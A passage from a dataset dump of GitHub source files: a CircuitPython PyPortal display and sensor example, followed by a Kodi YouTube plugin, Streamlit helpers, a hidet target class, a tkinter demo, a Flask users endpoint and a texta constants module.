adafruit_esp32spi.WL_IDLE_STATUS:\n print(\"ESP32 found and in idle mode\")\n print(\"Firmware vers.\", esp.firmware_version)\n print(\"MAC addr:\", [hex(i) for i in esp.MAC_address])\n\n for ap in esp.scan_networks():\n print(\"\\t%s\\t\\tRSSI: %d\" % (str(ap[\"ssid\"], \"utf-8\"), ap[\"rssi\"]))\n\n# Get our username, key and desired timezone\nlocation = secrets.get(\"timezone\", None)\n\nprint(\"\\nConnecting to AP...\")\nwhile not esp.is_connected:\n try:\n esp.connect_AP(secrets[\"ssid\"], secrets[\"password\"])\n except RuntimeError as e:\n print(\"could not connect to AP, retrying: \", e)\n continue\nprint(\"Connected to\", str(esp.ssid, \"utf-8\"), \"\\tRSSI:\", esp.rssi)\nprint(\"Please wait...\")\nif myVars.read(\"my_debug\"):\n print(\"My IP address is\", esp.pretty_ip(esp.ip_address))\n print(\n \"IP lookup adafruit.com: %s\"\n % esp.pretty_ip(esp.get_host_by_name(\"adafruit.com\"))\n )\n print(\"Ping google.com: %d ms\" % esp.ping(\"google.com\"))\n\n\ndef refresh_from_NTP():\n # Fetch and set the microcontroller's current UTC time\n # keep retrying until a valid time is returned\n timeout_cnt2 = 0\n while not ntp.valid_time:\n ntp.set_time(tz_offset)\n if myVars.read(\"my_debug\"):\n print(\"Failed to obtain time, retrying in 5 seconds...\")\n timeout_cnt2 += 1\n time.sleep(5)\n if timeout_cnt2 > 10:\n print(\"Timeout while trying to get ntp datetime to set the internal rtc\")\n break\n\n if myVars.read(\"my_debug\"):\n print(\"Value ntp.valid_time = \", ntp.valid_time)\n\n if ntp.valid_time:\n myVars.write(\"online_time_present\", True)\n myVars.write(\"ntp_refresh\", False)\n # Get the current time in seconds since Jan 1, 1970 and correct it for local timezone\n # (defined in secrets.h)\n ntp_current_time = time.time()\n if myVars.read(\"my_debug\"):\n print(\"Seconds since Jan 1, 1970: {} seconds\".format(ntp_current_time))\n\n # Convert the current time in seconds since Jan 1, 1970 to a struct_time\n myVars.write(\"default_dt\", time.localtime(ntp_current_time))\n if not myVars.read(\"my_debug\"):\n print(\n \"Internal clock synchronized from NTP pool, now =\",\n myVars.read(\"default_dt\"),\n )\n\n\nif myVars.read(\"use_ntp\"):\n # Initialize the NTP object\n ntp = NTP(esp)\n\n location = secrets.get(\"timezone\", location)\n if myVars.read(\"my_debug\"):\n print(\"location (from secrets.h) = \", location)\n if location == \"Europe/Lisbon\":\n if myVars.read(\"my_debug\"):\n print(\"Using timezone Europe/Lisbon\")\n tz_offset = 3600\n else:\n tz_offset = 0\n\n refresh_from_NTP()\n\npixel = neopixel.NeoPixel(board.NEOPIXEL, 1, 
brightness=1)\nWHITE = 0xFFFFFF\nRED = 0xFF0000\nYELLOW = 0xFFFF00\nGREEN = 0x00FF00\nBLUE = 0x0000FF\nPURPLE = 0xFF00FF\nBLACK = 0x000000\n\n# ---------- Sound Effects ------------- #\nsoundDemo = \"/sounds/sound.wav\"\nsoundBeep = \"/sounds/beep.wav\"\nsoundTab = \"/sounds/tab.wav\"\n\n# ------------ Touchscreen setup --------------- #\n# See: https://learn.adafruit.com/making-a-pyportal-user-interface-displayio/display\ndisplay = board.DISPLAY # create the display object\ndisplay.rotation = 0\n# screen_width = 320\n# screen_height = 240\nscreen_width = display.width\nscreen_height = display.height\n# -------Rotate 0:\n# Note @PaulskPt dd 2022-05-13\n# After using a touchscreen calibration script, the values are as follows:\n# (XL, YU, XR, YD) are: (6935, 10496, 60127, 57631)\nts = adafruit_touchscreen.Touchscreen(\n board.TOUCH_XL,\n board.TOUCH_XR,\n board.TOUCH_YD,\n board.TOUCH_YU, # #calibration=((5200, 59000), (5800, 57000)),\n calibration=((6815, 60095), (10520, 58007)),\n size=(screen_width, screen_height),\n) # was: screen_width, screen_height\n\"\"\"\n# If Rotate is 90:\n# -------Rotate 90:\nts = adafruit_touchscreen.Touchscreen(board.TOUCH_YU, board.TOUCH_YD,\n board.TOUCH_XL, board.TOUCH_XR,\n calibration=((5200, 59000), (5800, 57000)),\n size=(screen_height, screen_width))\n# If Rotate 180:\nts = adafruit_touchscreen.Touchscreen(board.TOUCH_XR, board.TOUCH_XL,\n board.TOUCH_YU, board.TOUCH_YD,\n calibration=((5200, 59000), (5800, 57000)),\n size=(screen_width, screen_height))\n\n# If Rotate 270:\nts = adafruit_touchscreen.Touchscreen(board.TOUCH_XL, board.TOUCH_XR,\n board.TOUCH_YD, board.TOUCH_YU,\n calibration=((5200, 59000), (5800, 57000)),\n size=(screen_height, screen_width))\n\"\"\"\n# -----------------------------------\n\n# create and show main_group\nmain_group = displayio.Group() # The Main Display Group\n\ndisplay.root_group = main_group\n\n# font = bitmap_font.load_font(\"fonts/Helvetica-Bold-16.bdf\")\nfont_arial = bitmap_font.load_font(\"/fonts/Arial-16.bdf\")\nfont_term = terminalio.FONT\n\n# create the page layout\ntest_page_layout = TabLayout(\n x=0,\n y=0,\n display=board.DISPLAY,\n tab_text_scale=2,\n custom_font=font_term,\n inactive_tab_spritesheet=\"lib/adafruit_displayio_layout/examples/bmps/inactive_tab_sprite.bmp\",\n showing_tab_spritesheet=\"lib/adafruit_displayio_layout/examples/bmps/active_tab_sprite.bmp\",\n showing_tab_text_color=0x00AA59,\n inactive_tab_text_color=0xEEEEEE,\n inactive_tab_transparent_indexes=(0, 1),\n showing_tab_transparent_indexes=(0, 1),\n tab_count=4,\n)\n# make 4 pages of content\npge1_group = displayio.Group()\npge2_group = displayio.Group()\npge3_group = displayio.Group()\npge4_group = displayio.Group()\n# make 1 background group\nbg_group = displayio.Group()\n\n\"\"\"\n From: https://learn.adafruit.com/making-a-pyportal-user-interface-displayio/the-full-code\n\"\"\"\n\n\n# This will handle switching Images and Icons\ndef set_image(group, filename):\n \"\"\"Set the image file for a given goup for display.\n This is most useful for Icons or image slideshows.\n :param group: The chosen group\n :param filename: The filename of the chosen image\n \"\"\"\n print(\"Set image to \", filename)\n image = None\n image_sprite = None\n if group:\n group.pop()\n if not filename:\n return # we're done, no icon desired\n # CircuitPython 6 & 7 compatible\n try:\n image = displayio.OnDiskBitmap(filename)\n except OSError as exc:\n if exc.args[0] == 2: # No such file/directory\n return\n if image is not None:\n image_sprite = 
displayio.TileGrid(\n image,\n pixel_shader=getattr(image, \"pixel_shader\", displayio.ColorConverter()),\n )\n if image_sprite is not None:\n main_group.append(image_sprite)\n\n\n# ------------- Setup for Images ------------- #\n\nbg_group = displayio.Group()\nset_image(bg_group, \"/images/BGimage4.bmp\")\nprint(\n \"Please wait...building-up things...\"\n) # 2022-05-08 13h19 (utc+1) It takes 24 seconds from here to start of main() loop\nmain_group.append(bg_group)\n\nicon_group = displayio.Group()\nicon_group.x = 180\nicon_group.y = 120\nicon_group.scale = 1\npge2_group.append(icon_group)\n\n# labels\npge1_lbl = Label(\n font=font_term,\n scale=2,\n text=\"This is the first page!\",\n anchor_point=(0, 0),\n anchored_position=(10, 10),\n)\npge1_lbl2 = Label(\n font=font_term,\n scale=2,\n text=\"Please wait...\",\n anchor_point=(0, 0),\n anchored_position=(10, 150),\n)\npge2_lbl = Label(\n font=font_term,\n scale=2,\n text=\"This page is the second page!\",\n anchor_point=(0, 0),\n anchored_position=(10, 10),\n)\npge3_lbl = Label(\n font=font_term,\n scale=2,\n text=myVars.read(\"pge3_lbl_dflt\"), # Will be \"Date/time:\"\n anchor_point=(0, 0),\n anchored_position=(10, 10),\n)\npge3_lbl2 = Label(\n font=font_term,\n scale=2,\n text=\"\", # pge3_lbl2_dflt, # Will be DD-MO-YYYY or Month-DD-YYYY\n anchor_point=(0, 0),\n anchored_position=(10, 40),\n)\npge3_lbl3 = Label(\n font=font_term,\n scale=2,\n text=\"\", # pge3_lbl3_dflt, # Will be HH:MM:SS\n anchor_point=(0, 0),\n anchored_position=(10, 70),\n)\npge3_lbl4 = Label(\n font=font_term,\n scale=2,\n text=\"\", # pge3_lbl3_dflt, # Will be time until next NTP sync in MM:SS\n anchor_point=(0, 0),\n anchored_position=(10, 200),\n)\npge4_lbl = Label(\n font=font_term,\n scale=2,\n text=myVars.read(\"pge4_lbl_dflt\"),\n anchor_point=(0, 0),\n anchored_position=(10, 10),\n)\npge4_lbl2 = Label(\n font=font_term,\n scale=2,\n text=\"\", # Will be \"Temperature\"\n anchor_point=(0, 0),\n anchored_position=(10, 130),\n)\npge4_lbl3 = Label(\n font=font_arial, # bitmap_font.load_font(\"/fonts/Arial-16.bdf\"),\n scale=2,\n text=\"\", # Will be \"xx.yy ºC\"\n anchor_point=(0, 0),\n anchored_position=(10, 160),\n)\n\n# shapes\nsquare = Rect(x=20, y=70, width=40, height=40, fill=0x00DD00)\ncircle = Circle(50, 100, r=30, fill=0xDD00DD)\ntriangle = Triangle(50, 0, 100, 50, 0, 50, fill=0xDDDD00)\nrectangle = Rect(x=80, y=60, width=100, height=50, fill=0x0000DD)\n\ntriangle.x = 80\ntriangle.y = 70\n\n# add everything to their page groups\npge1_group.append(square)\npge1_group.append(pge1_lbl)\npge1_group.append(pge1_lbl2)\npge2_group.append(pge2_lbl)\npge2_group.append(circle)\npge3_group.append(pge3_lbl)\npge3_group.append(pge3_lbl2)\npge3_group.append(pge3_lbl3)\npge3_group.append(pge3_lbl4)\npge3_group.append(triangle)\npge4_group.append(pge4_lbl)\npge4_group.append(pge4_lbl2)\npge4_group.append(pge4_lbl3)\npge4_group.append(rectangle)\n\nif board.board_id == \"pyportal_titano\":\n pages = {0: \"Dum\", 1: \"One\", 2: \"Two\", 3: \"Three\", 4: \"Four\"}\nelse:\n pages = {0: \"Dum\", 1: \"One\", 2: \"Two\", 3: \"Thr\", 4: \"For\"}\n\n# add the pages to the layout, supply your own page names\ntest_page_layout.add_content(pge1_group, pages[1])\ntest_page_layout.add_content(pge2_group, pages[2])\ntest_page_layout.add_content(pge3_group, pages[3])\ntest_page_layout.add_content(pge4_group, pages[4])\n# test_page_layout.add_content(displayio.Group(), \"page_5\")\n# add it to the group that is showing on the display\nmain_group.append(test_page_layout)\n# 
test_page_layout.tab_tilegrids_group[3].x += 50\n# ---------- Text Boxes ------------- #\n# Set the font and preload letters\n# font = bitmap_font.load_font(\"/fonts/Arial-16.bdf\") # was: Helvetica-Bold-16.bdf\")\n# font.load_glyphs(b\"abcdefghjiklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890- ()\")\nglyphs = b' \"(),-.0123456789:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'\nfont_arial.load_glyphs(glyphs)\nfont_arial.load_glyphs((\"°\",)) # a non-ascii character we need\n# font=font_term.collect() # ADDED by @PaulskPt --\n# to prevent MemoryError - memory allocation failed,\n# allocating 6444 bytes\n\npge2_group = 1\n\n\n\"\"\"If the temperature sensor has been disconnected,\n this function will try to reconnect (test if the sensor is present by now)\n If reconnected this function creates the temp_sensor object\"\"\"\n\n\ndef connect_temp_sensor():\n t = \"temperature sensor found\"\n\n # myVars.write(\"temp_sensor\",None)\n\n try:\n myVars.write(\"temp_sensor\", adafruit_tmp117.TMP117(i2c))\n except ValueError: # ValueError occurs if the temperature sensor is not connected\n pass\n\n print(\n \"connect_temp_sensor(): type(temp_sensor) object = \",\n type(myVars.read(\"temp_sensor\")),\n )\n if myVars.read(\"temp_sensor\") is not None:\n print(t)\n print(\"temperature sensor connected\")\n myVars.write(\"t0\", \"Temperature\")\n if myVars.read(\"temp_in_fahrenheit\"):\n myVars.write(\"t1\", chr(186) + \"F\")\n else:\n myVars.write(\"t1\", chr(186) + \"C\")\n myVars.write(\"t2\", 27 * \"_\")\n else:\n print(\"no \" + t)\n print(\"failed to connect temperature sensor\")\n myVars.write(\"t0\", None)\n myVars.write(\"t1\", None)\n myVars.write(\"t2\", None)\n\n\n\"\"\" If the external rtc has been disconnected,\n this function will try to reconnect (test if the external rtc is present by now)\"\"\"\n\n\ndef connect_rtc():\n t = \"RTC found\"\n\n # myVars.write(\"rtc\",None)\n\n try:\n myVars.write(\"rtc\", DS3231(i2c)) # i2c addres 0x68\n # myVars.write(\"rtc\",rtc)\n except ValueError:\n pass\n\n print(\"connect_rtc() type rtc object = \", type(myVars.read(\"rtc\")))\n if myVars.read(\"rtc\") is not None:\n print(t)\n print(\"RTC connected\")\n if myVars.read(\"lStart\"):\n myVars.write(\"lStart\", False)\n myVars.read(\"rtc\").datetime = myVars.read(\"default_dt\")\n else:\n print(\"no \" + t)\n print(\"Failed to connect RTC\")\n\n\n\"\"\"Function gets a value from the external temperature sensor\n It only updates if the value has changed compared to the previous value\n A fixed text is set in pge4_lbl2.text. 
The variable temperature value is set in pge4_lbl3.text\n If no value obtained (for instance if the sensor is disconnected),\n the function sets the pge4_lbl to a default text and makes empty\n pge4_lbl2.text and pge4_lbl3.text\"\"\"\n\n\ndef get_temp():\n my_debug = myVars.read(\"my_debug\")\n showing_page_idx = test_page_layout.showing_page_index\n RetVal = False\n if myVars.read(\"temp_sensor\") is not None:\n try:\n temp = myVars.read(\"temp_sensor\").temperature\n if myVars.read(\"temp_in_fahrenheit\"):\n temp = (temp * 1.8) + 32\n t = \"{:5.2f}{} \".format(temp, myVars.read(\"t1\"))\n if my_debug and temp is not None and not myVars.read(\"temp_in_REPL\"):\n myVars.write(\"temp_in_REPL\", True)\n print(\"get_temp(): {} {}\".format(myVars.read(\"t0\"), t))\n if showing_page_idx == 3: # show temperature on most right Tab page\n if temp is not None:\n if temp != myVars.read(\n \"old_temp\"\n ): # Only update if there is a change in temperature\n myVars.write(\"old_temp\", temp)\n t = \"{:5.2f}{} \".format(temp, myVars.read(\"t1\"))\n pge4_lbl.text = \"\"\n pge4_lbl2.text = myVars.read(\"t0\")\n pge4_lbl3.text = t\n # if not my_debug:\n # print(\"pge4_lbl.tex.gvars {}\".format(pge4_lbl.text))\n # time.sleep(2)\n RetVal = True\n else:\n t = \"\"\n pge4_lbl.text = myVars.read(\"pge4_lbl_dflt\")\n except OSError:\n print(\"Temperature sensor has disconnected\")\n t = \"\"\n myVars.write(\"temp_sensor\", None)\n pge4_lbl.text = myVars.read(\n \"pge4_lbl_dflt\"\n ) # clean the line (eventually: t2)\n pge4_lbl2.text = \"Sensor disconnected.\"\n pge4_lbl3.text = \"Check wiring.\"\n return RetVal\n\n\n# Moved these six definitions outside handle_dt()\n# to correct pylint error 'too many variables'\ndt_ridxs = {\"yy\": 0, \"mo\": 1, \"dd\": 2, \"hh\": 3, \"mm\": 4, \"ss\": 5}\n\n# print(\"dict dt_ridxs =\", dt_ridxs.keys())\n\n\n\"\"\" Function called by get_dt()\n Created to repair pylint error R0912: Too many branches (13/12)\"\"\"\n\n\ndef handle_dt(dt):\n my_debug = myVars.read(\"my_debug\")\n RetVal = False\n s = \"Date/time: \"\n sYY = str(dt[dt_ridxs[\"yy\"]]) # was: str(dt[yy])\n # print(\"dt_ridxs[\"mo\"] = \", dt_ridxs[\"mo\"])\n # modified mo because plynt error R0914 'Too many local variables'\n # mo = dt_ridxs[\"mo\"]\n dd = dt_ridxs[\"dd\"]\n hh = dt_ridxs[\"hh\"]\n mm = dt_ridxs[\"mm\"]\n ss = dt_ridxs[\"ss\"]\n if \"mo\" in dt_ridxs:\n sMO = (\n months[dt[dt_ridxs[\"mo\"]]] # was: months[dt[mo]]\n if myVars.read(\"use_txt_in_month\")\n else \"0\" + str(dt[dt_ridxs[\"mo\"]])\n if dt[dt_ridxs[\"mo\"]] < 10\n else str(dt[dt_ridxs[\"mo\"]])\n )\n else:\n raise KeyError(\"key {} not in dt_ridxs dict\".format(\"mo\"))\n\n dt_dict = {}\n\n for _ in range(dd, ss + 1):\n dt_dict[_] = \"0\" + str(dt[_]) if dt[_] < 10 else str(dt[_])\n\n if my_debug:\n print(\"dt_dict = \", dt_dict)\n\n myVars.write(\"c_secs\", dt_dict[ss])\n sDT = (\n sMO + \"-\" + dt_dict[dd] + \"-\" + sYY\n if myVars.read(\"use_usa_notation\")\n else sYY + \"-\" + sMO + \"-\" + dt_dict[dd]\n )\n if my_debug:\n print(\"handle_dt(): sDT_old = {}, sDT = {}\".format(myVars.read(\"sDT_old\"), sDT))\n if myVars.read(\"sDT_old\") != sDT:\n myVars.write(\"sDT_old\", sDT)\n myVars.write(\"dt_refresh\", True) # The date has changed, set the refresh flag\n sDT2 = dt_dict[hh] + \":\" + dt_dict[mm] + \":\" + dt_dict[ss]\n\n if myVars.read(\"dt_refresh\"): # only refresh when needed\n myVars.write(\"dt_refresh\", False)\n pge3_lbl.text = s\n pge3_lbl2.text = sDT\n\n if myVars.read(\"c_secs\") != myVars.read(\"o_secs\"):\n 
myVars.write(\"o_secs\", myVars.read(\"c_secs\"))\n sDT3 = s + \"{} {}\".format(sDT, sDT2)\n print(sDT3)\n\n pge3_lbl3.text = sDT2\n if my_debug:\n print(\"pge3_lbl.text = {}\".format(pge3_lbl.text))\n print(\"pge3_lbl2.text = {}\".format(pge3_lbl2.text))\n print(\"pge3_lbl3.text = {}\".format(pge3_lbl3.text))\n RetVal = True\n\n # Return from here with a False but don't set the pge3_lbl to default.\n # It is only to say to the loop() that we did't update the datetime\n return RetVal\n\n\n\"\"\"Function gets the date and time:\n a) if an rtc is present from the rtc;\n b) if using online NTP pool server then get the date and time from the function time.localtime\n This time.localtime has before been set with data from the NTP server.\n In both cases the date and time will be set to the pge3_lbl, pge3_lbl12 and pge3_lbl3\n If no (valid) date and time received then a default text will be shown on the pge3_lbl\"\"\"\n\n\ndef get_dt():\n dt = None\n RetVal = False\n\n if myVars.read(\"rtc\") is not None:\n try:\n dt = myVars.read(\"rtc\").datetime\n except OSError as exc:\n if myVars.read(\"my_debug\"):\n print(\"Error number: \", exc.args[0])\n if exc.args[0] == 5: # Input/output error\n print(\"get_dt(): OSError occurred. RTC probably is disconnected\")\n pge3_lbl.text = myVars.read(\"pge3_lbl_dflt\")\n myVars.write(\"sDT_old\", \"\")\n pge3_lbl2.text = \"\"\n pge3_lbl3.text = \"\"\n return RetVal\n raise # Handle other errors\n\n elif myVars.read(\"online_time_present\") or myVars.read(\"use_ntp\"):\n dt = time.localtime()\n\n if myVars.read(\"my_debug\"):\n print(\"get_dt(): dt = \", dt)\n if dt is not None:\n RetVal = handle_dt(dt)\n else:\n pge3_lbl.text = myVars.read(\"pge3_lbl_dflt\")\n pge3_lbl2.text = \"\"\n pge3_lbl3.text = \"\"\n return RetVal\n\n\n\"\"\" hms_to_cnt()\n function returns a integer value representing\n the conversion from the current hours, minutes and seconds\n into seconds\"\"\"\n\n\ndef hms_to_cnt():\n dt = time.localtime() # get the local time as a time_struct\n return (dt.tm_hour * 3600) + (dt.tm_min * 60) + dt.tm_sec\n\n\n\"\"\" Created this function to correct pylint errors:\n 'Too many branches' R0912 and\n 'Too many statements' R0915\"\"\"\n\n\ndef ck_next_NTP_sync():\n s_cnt = myVars.read(\"s_cnt\")\n c_cnt = hms_to_cnt() # set current count (seconds)\n c_elapsed = c_cnt - s_cnt\n if c_elapsed < 10: # continue only when c_elapsed >= 10\n return\n TAG = \"ck_next_NTP_sync(): \"\n my_debug = myVars.read(\"my_debug\")\n t1 = myVars.read(\"next_NTP_sync_t1\")\n t3 = myVars.read(\"next_NTP_sync_t3\")\n five_min = myVars.read(\"five_min_cnt\")\n myVars.write(\"s_cnt\", hms_to_cnt())\n # --- five minutes count down calculations #1 ---\n if my_debug:\n print(\n TAG + \"five_min = {}, s_cnt = {}, c_cnt = {}\".format(five_min, s_cnt, c_cnt)\n )\n print(TAG + \"c_elapsed = \", c_elapsed)\n\n # --- five minutes count down calculations #2 ---\n myVars.write(\"s_cnt\", c_cnt) # remember c_cnt\n five_min -= 10\n myVars.write(\"five_min_cnt\", five_min) # remember count\n mm2 = five_min // 60\n ss2 = five_min - (mm2 * 60)\n t2 = \"{:02d}:{:02d}\".format(mm2, ss2)\n t0 = t1 + t2 + t3\n print(t0)\n pge3_lbl4.text = t0\n if five_min == 0: # five minutes passed\n pge3_lbl4.text = \"\"\n myVars.write(\"five_min_cnt\", 300) # reset count\n myVars.write(\"ntp_refresh\", True)\n\n\ndef inc_cnt(cnt):\n cnt += 1\n if cnt > 999:\n cnt = 0\n return cnt\n\n\ndef main():\n cnt = 1\n wipe_pge1_lbl2_text = False\n print(\"Starting loop\")\n pge1_lbl2.text = \"Ready...\"\n 
myVars.write(\"five_min_cnt\", 300) # 5 minutes\n myVars.write(\"s_cnt\", hms_to_cnt()) # set start count (seconds)\n use_ntp = myVars.read(\"use_ntp\")\n rtc = myVars.read(\"rtc\")\n otp = myVars.read(\"online_time_present\")\n # print(\"Starting loop\")\n while True:\n touch = ts.touch_point\n try:\n if use_ntp:\n ck_next_NTP_sync()\n ntp_refresh = myVars.read(\"ntp_refresh\")\n # ------------- Handle Tab touch ------------- #\n # print(\"main() value touch: \", touch)\n if touch: # Only do this if the screen is touched\n if not wipe_pge1_lbl2_text:\n pge1_lbl2.text = \"\" # Clear the label\n wipe_pge1_lbl2_text = True\n test_page_layout.handle_touch_events(touch)\n if rtc is not None or otp:\n if otp and ntp_refresh:\n refresh_from_NTP() # first re-synchronize internal clock from NTP server\n if get_dt():\n print(\"Loop nr: {:03d}\".format(cnt))\n else:\n connect_rtc()\n if myVars.read(\"temp_sensor\") is not None:\n get_temp()\n else:\n connect_temp_sensor()\n touch = (\n ts.touch_point\n ) # Just to try - it looks like after re-connecting the sensor,\n # the touch data has lost\n if myVars.read(\"temp_in_REPL\"):\n myVars.write(\"temp_in_REPL\", False)\n cnt = inc_cnt(cnt)\n except KeyboardInterrupt as exc:\n print(\"Keyboard interrupt...exiting...\")\n raise KeyboardInterrupt from exc\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"adafruit/Adafruit_CircuitPython_DisplayIO_Layout","sub_path":"examples/hotplug_sensor_examples/displayio_layout_hotplug_temp_sensor.py","file_name":"displayio_layout_hotplug_temp_sensor.py","file_ext":"py","file_size_in_byte":31719,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"70"}
+{"seq_id":"586403046","text":"import plugintools\nfrom logos import logos_bands\n\nLIVE_SHOWS = \"plugin://plugin.video.youtube/playlist/PLGuhlLazJwGsqskC5RY0qt8Pk0xclK14f/\"\nOFFICIAL_VIDEOS = \"plugin://plugin.video.youtube/playlist/PLF84630BDCCB15277/\"\nBEST_OF = \"plugin://plugin.video.youtube/playlist/PLe7ia_jeVGd_vsqcTDyeeOHawvqoBFGbK/\"\n\ndef accept1(params):\n logo=logos_bands.accept(params)\n\n plugintools.add_item( \n title=\"Live Shows\",\n url=LIVE_SHOWS,\n thumbnail=logo,folder=True )\n \n plugintools.add_item( \n title=\"Official Videos\",\n url=OFFICIAL_VIDEOS,\n thumbnail=logo, folder=True )\n \n plugintools.add_item( \n title=\"Official Best of\",\n url=BEST_OF,\n thumbnail=logo, folder=True )\n\n\n","repo_name":"kodimetalbox/repo5","sub_path":"plugin.video.MetalOnMetal/bands/accept.py","file_name":"accept.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"42760271391","text":"import streamlit as st\n\n\ndef use_custom_css():\n with open(\"custom.css\") as custom_css:\n return st.write(f'', unsafe_allow_html=True)\n\n\ndef check_openai_key():\n if st.session_state.get(\"api_success\", False) is False:\n st.warning(\"\"\"\n No OpenAI key was found! If you don't set the OpenAI Key, none of the exercises here will work.\n \"\"\", icon=\"🤦♀️\")\n with st.form(\"openai_key_form\"):\n st.subheader(\"Enter your OpenAI API Key\")\n st.text_input(\"OpenAI API Key\", placeholder=\"sk-...\", key=\"openai_key\")\n\n submitted = st.form_submit_button(\"Submit\")\n\n if submitted:\n from openai.error import AuthenticationError\n try:\n import openai\n openai.api_key = st.session_state.openai_key\n openai.Model.list()\n except AuthenticationError:\n st.session_state[\"api_success\"] = False\n st.error(\n \"An incorrect API Key was provided. You can find your API key at \"\n \"https://platform.openai.com/account/api-keys.\"\n )\n return\n st.session_state[\"api_success\"] = True\n st.success(\"Success! You are good to go.\", icon=\"🎉\")\n\n\ndef write_footer():\n st.divider()\n st.write(\n \"\"\"\nPrompt Engineering for Lawyers © 2023 by Ang Hou Fu is licensed under Attribution-ShareAlike 4.0 International \n[](https://github.com/houfu/prompt-engineering-lawyers) \n \"\"\"\n )\n","repo_name":"houfu/prompt-engineering-lawyers","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"70"}
+{"seq_id":"14893047002","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom __future__ import annotations\nfrom typing import List, Dict\n\n\nclass Target:\n _supported_targets = ['cuda', 'cpu']\n\n def __init__(self, name: str, flags: List[str], attrs: Dict[str, str]):\n if name not in self._supported_targets:\n raise ValueError('Does not support target {}, candidates {}.'.format(name, self._supported_targets))\n self.name = name\n self.flags: List[str] = flags\n self.attrs: Dict[str, str] = attrs\n\n self._check()\n\n @staticmethod\n def from_string(target_string: str) -> Target:\n items: List[str] = target_string.strip().split()\n name, items = items[0], items[1:]\n flags = []\n attrs = {}\n for item in items:\n if item.startswith('--'):\n key, value = item[2:].split('=')\n attrs[key] = value\n elif item.startswith('-'):\n flags.append(item)\n else:\n raise ValueError('Cannot recognize target item \"{}\".'.format(item))\n return Target(name, flags, attrs)\n\n def _check(self):\n if self.name == 'cpu':\n valid_flags = []\n valid_attrs = {}\n elif self.name == 'cuda':\n valid_flags = []\n valid_attrs = ['arch'] # e.g., '--arch=sm_80'\n else:\n raise ValueError('Cannot recognize target \"{}\".'.format(self.name))\n for flag in self.flags:\n if flag not in valid_flags:\n raise ValueError('Invalid flag \"{}\" for target \"{}\".'.format(flag, self.name))\n for attr in self.attrs:\n if attr not in valid_attrs:\n raise ValueError('Invalid attribute \"{}\" for target \"{}\".'.format(attr, self.name))\n","repo_name":"hidet-org/hidet","sub_path":"python/hidet/ir/target.py","file_name":"target.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":546,"dataset":"github-code","pt":"70"}
+{"seq_id":"27549332905","text":"from tkinter import *\n\nroot = Tk()\n\nplaya = IntVar()\nmontania = IntVar()\nturismoRural = IntVar()\n\ndef opcionesViaje():\n opcionesElegidas = \"\"\n if playa.get() == 1:\n opcionesElegidas+= \" Playa\"\n if montania.get() == 1:\n opcionesElegidas+= \" Montaña\"\n if turismoRural.get() == 1:\n opcionesElegidas+= \" Turismo rural\"\n\n textoFinal.config(text = opcionesElegidas)\n\n\nframe = Frame(root)\nframe.pack()\n\nLabel(frame, text = \"Elije destinos\", width = 50).pack()\n\nCheckbutton(frame, text = \"Playa\", variable = playa, onvalue = 1, offvalue = 0, command=opcionesViaje).pack()\nCheckbutton(frame, text = \"Montaña\", variable = montania, onvalue = 1, offvalue = 0, command=opcionesViaje).pack()\nCheckbutton(frame, text = \"Turismo rural\", variable = turismoRural, onvalue = 1, offvalue = 0, command=opcionesViaje).pack()\n\ntextoFinal = Label(frame)\ntextoFinal.pack()\n\nroot.mainloop()\n","repo_name":"ciriusblb/python","sub_path":"checkButtons.py","file_name":"checkButtons.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"20041104510","text":"from flask import request, jsonify\nfrom flask.views import MethodView\nfrom flask_jwt import jwt_required, current_user\n\nfrom app import db\n\n\nclass UsersAPI(MethodView):\n\n @jwt_required()\n def get(self):\n return jsonify(current_user.serialize)\n\n @jwt_required()\n def patch(self):\n data = request.get_json(force=True)\n try:\n for field, value in data.items():\n if field in UsersAPI.allowed_fields:\n setattr(current_user, field, value)\n else:\n raise KeyError()\n db.session.add(current_user)\n db.session.commit()\n return jsonify({'success': 1})\n except Exception as e:\n return jsonify({'success': 0})\n\n @classmethod\n def register(cls, mod):\n url = '/users'\n symfunc = cls.as_view('users_api')\n mod.add_url_rule(url, view_func=symfunc, methods=['GET', 'PATCH'])\n","repo_name":"vladi-dev/emve-backend","sub_path":"app/api/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"23189033902","text":"from texta_elastic.core import ElasticCore\n\n\n'''For storing constant variables'''\n# Default max description lenght for models\nMAX_DESC_LEN = 1000\n\n\ndef get_field_choices():\n \"\"\"\n Retrieves field options from ES.\n \"\"\"\n es = ElasticCore()\n if es.connection:\n return [(a, '{0} - {1}'.format(a['index'], a['path'])) for a in es.get_fields()]\n else:\n return []\n","repo_name":"texta-tk/texta","sub_path":"toolkit/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"70"}
